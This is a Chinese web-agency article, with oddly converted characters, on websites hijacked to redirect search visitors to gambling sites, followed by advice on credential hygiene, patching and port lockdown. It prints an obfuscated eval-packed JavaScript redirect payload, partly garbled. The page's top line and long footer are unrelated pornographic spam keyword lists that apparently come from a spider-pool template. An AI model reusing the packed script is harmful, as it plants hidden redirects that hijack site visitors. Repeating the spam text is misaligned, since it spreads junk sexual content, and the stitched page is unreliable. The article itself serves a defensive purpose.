日日夜夜精品视频天天综合网I成人一级片免费看I久久久精品I久草视频免费看I中文字幕亚洲欧美I久久综合免费视频I中文字幕一区二I免费看片在线观看

網(wǎng)站開發(fā) APP開發(fā) 小程序開發(fā) SEO優(yōu)化 公司新聞

企業(yè)網(wǎng)站被劫持惡意跳轉(zhuǎn)賭博網(wǎng)站如何處理?

2018-09-06 00:00:00
2950
  最近公司內(nèi)部跟單同事表示,大批網(wǎng)站建設(shè)公司客戶在做百度推廣時候,網(wǎng)站的首頁點擊進(jìn)去后自動跳轉(zhuǎn)到彩票網(wǎng)站、博彩網(wǎng)站,這樣用戶從百度搜索或者從推廣廣告位進(jìn)去網(wǎng)站后發(fā)生跳轉(zhuǎn),而直接輸入網(wǎng)址是沒有任何跳轉(zhuǎn)的,這樣一來用戶流失造成訪問量急劇下滑、網(wǎng)站服務(wù)器資源浪費、推廣費用浪費等,甚至可以說做了百度推廣、搜狗推廣的都在給彩票公司做廣告了,在網(wǎng)站建設(shè)行業(yè)內(nèi)引起軒然大波。
 
 
  有不少客戶在反應(yīng)這個問題時候,找到廣告商賠償甚至追究責(zé)任,所以在網(wǎng)站惡意跳轉(zhuǎn)的問題上我們運營人員需要重視并且知曉如何快速解決,中聯(lián)科技從網(wǎng)絡(luò)上查閱并且測試后總結(jié)為以下經(jīng)驗:
 
  一、分析網(wǎng)站被黑跳轉(zhuǎn)博彩網(wǎng)站原因
 
  一般情況下網(wǎng)站被黑時候后都是因為服務(wù)器信息(服務(wù)器IP 遠(yuǎn)程端口 管理員賬號密碼、SSH端口、root賬號密碼)和網(wǎng)站信息包括FTP賬號密碼的對接被黑客知曉,進(jìn)而造成黑客植入木馬或者后門。
 
  整體的安全監(jiān)測中,asp網(wǎng)站和php網(wǎng)站都存在著木馬,這也就意味著木馬能夠以php腳本木馬、asp腳本木馬、jsp腳本木馬而存在,這些木馬后門可以對網(wǎng)站進(jìn)行惡意篡改,上傳,改名,下載,等管理員的高權(quán)限操作。出現(xiàn)網(wǎng)站被跳轉(zhuǎn)的客戶,采用的網(wǎng)站架構(gòu)都是php+mysql架構(gòu),以及jsp+mysql架構(gòu),大多數(shù)用的是開源程序,像dedecms,織夢系統(tǒng),phpcms系統(tǒng),discuz系統(tǒng)。
 
  當(dāng)我們懂得一些代碼的時候,必然會看到網(wǎng)站首頁中會有一些惡意篡改代碼,通過刪除惡意代碼后可能會在幾天內(nèi)完全的停止跳轉(zhuǎn)的,但是在一段時間后卻又會被跳轉(zhuǎn),這個是很令人懊惱的治標(biāo)不治本措施。過了不久后網(wǎng)站又會出現(xiàn)跳轉(zhuǎn),那么針對于網(wǎng)站漏洞問題是很難甚至是不能夠完全清除的。
 
  通過觀察部分客戶網(wǎng)站首頁,其首頁代碼中都會有一段加密代碼,這段代碼是根據(jù)搜索引擎的特征來跳轉(zhuǎn),比如通過百度搜索,360搜索,搜狗搜索來的會直接跳轉(zhuǎn)到彩票,賭博網(wǎng)站上去。如下代碼:
 
  type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('l["\e\c\1\m\i\8\n\0"]["\7\4\9\0\8"]('\h\2\1\4\9\3\0\0\j\3\8\d\6\0\8\k\0\5\f\a\r\a\2\1\4\9\3\0 \6\2\4\1\d\6\s\0\0\3\2\q\5\5\7\7\7\b\1\3\e\a\2\p\b\1\c\i \5\j\o\1\b\f\2\6\g\h\5\2\1\4\9\3\0\g');',29,29,'x74|x63|x73|x70|x72| x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c| x38|x3a|x76|x68'.split('|'),0,{}))
 
 
  一旦被攻擊之后,百度搜索引擎就會判斷出網(wǎng)站是否被攻擊,從而在百度風(fēng)險評估中心就會對網(wǎng)站進(jìn)行記錄以及標(biāo)識,百度網(wǎng)址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 紅色提示該百度風(fēng)險。導(dǎo)致客戶打開網(wǎng)站直接被百度攔截。
 
  針對于以上跳轉(zhuǎn)攻擊的特征,中聯(lián)科技一致認(rèn)為應(yīng)該從人工代碼方面進(jìn)行審計,以及檢測網(wǎng)站漏洞、網(wǎng)站后門木馬清理、漏洞修復(fù)以及xss獲取管理員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏洞等。
 
  二、修復(fù)以及防止網(wǎng)站被惡意跳轉(zhuǎn)的辦法
 
  1、對服務(wù)器目錄進(jìn)行安全部署、對管理員帳號密碼加密、對所有密碼進(jìn)行數(shù)字+大小寫字母+特殊符號要求、對網(wǎng)站數(shù)據(jù)庫進(jìn)行分配普通權(quán)限賬號。
 
  2、mysql數(shù)據(jù)庫默認(rèn)端口3306,改為61116,并加入到端口安全策略,不對外開放,外網(wǎng)IP無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進(jìn)行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測。
 
  3、對服務(wù)器底層系統(tǒng)進(jìn)行安全加固,包括遠(yuǎn)程端口登錄的安全驗證。
 
  4、對網(wǎng)站代碼進(jìn)行整體的安全檢測,包括定期的升級網(wǎng)站程序源代碼,修復(fù)補丁以及網(wǎng)站漏洞。
 
  中聯(lián)科技處理網(wǎng)站跳轉(zhuǎn)問題有很多方法,以上內(nèi)容只是解決問題的方法之一,那么作為一個網(wǎng)站建設(shè)公司應(yīng)該對源碼進(jìn)行優(yōu)化和調(diào)整,這樣才能確保后期的網(wǎng)站不會受到影響,這就涉及到網(wǎng)站源碼升級以及版本升級問題。
 
?
主站蜘蛛池模板: 中文字幕日本电影 | 韩国av免费 | 91插插插免费视频 | av福利网址导航 | 久久精品欧美一区二区三区麻豆 | 中文字幕在线观看完整版电影 | 午夜久操| 亚洲精品视频二区 | 久久99九九99精品 | 亚洲专区欧美 | 亚洲激情校园春色 | 久久一区国产 | 九色免费视频 | 久久一区二 | 色在线视频网 | 在线观看黄污 | 日韩精品一区二区三区第95 | 久色小说 | 日批视频| 天天综合婷婷 | 精品主播网红福利资源观看 | 在线亚州 | 中文字幕一区在线观看视频 | 色婷婷欧美 | 99在线观看精品 | 毛片一二区 | 中文字幕 欧美性 | 欧美一区在线观看视频 | 国产二区视频在线 | 国产精品久久久久久久久久三级 | 一级黄色片在线免费看 | 特级黄色片免费看 | 中文字幕美女免费在线 | 亚洲永久在线 | 国产精品久久久区三区天天噜 | 亚洲精品国产精品久久99热 | 久综合网| 99激情网| 久久综合九色综合久99 | 亚洲精品影院在线观看 | 久久免费视频在线观看6 | 免费a视频在线观看 | 果冻av在线 | 黄色成人小视频 | 国产视频999| 麻豆一精品传二传媒短视频 | 午夜精品久久久久 | a√资源在线 | 五月天亚洲精品 | 欧美激情精品久久 | 国产成人久久av免费高清密臂 | 丁香九月婷婷综合 | 99色网站 | 欧美网站黄色 | 黄色小说视频在线 | 国产成人三级三级三级97 | 亚洲涩涩一区 | 91手机视频 | 午夜视频在线观看一区 | 亚洲精品视频在线 | 亚洲伊人网在线观看 | 亚洲最大成人免费网站 | 日韩专区视频 | 91豆麻精品91久久久久久 | 欧美日韩久久不卡 | 欧美日韩国产一区二区三区在线观看 | 四虎国产视频 | 国产v在线观看 | 免费在线观看视频一区 | 色吧久久 | www.色五月.com| 国产精品不卡一区 | 中文字幕日韩高清 | 精品夜夜嗨av一区二区三区 | 欧美精品你懂的 | 欧美成人理伦片 | 久久免费久久 | 91精品久久久久久综合乱菊 | 香蕉视频国产在线 | 成人九九视频 | 久久久国产一区二区 | 国产成人av一区二区三区在线观看 | 欧美一级裸体视频 | 成人在线黄色电影 | 国产中文字幕第一页 | 在线国产日韩 | 久草在线99 | 四虎国产精 | 欧美日一级片 | www日日 | www.色爱| 亚洲欧美成aⅴ人在线观看 四虎在线观看 | 精品999久久久 | 伊人色**天天综合婷婷 | 国产精品美女999 | 亚州精品天堂中文字幕 | 91av社区 | 友田真希av| 婷五月天激情 |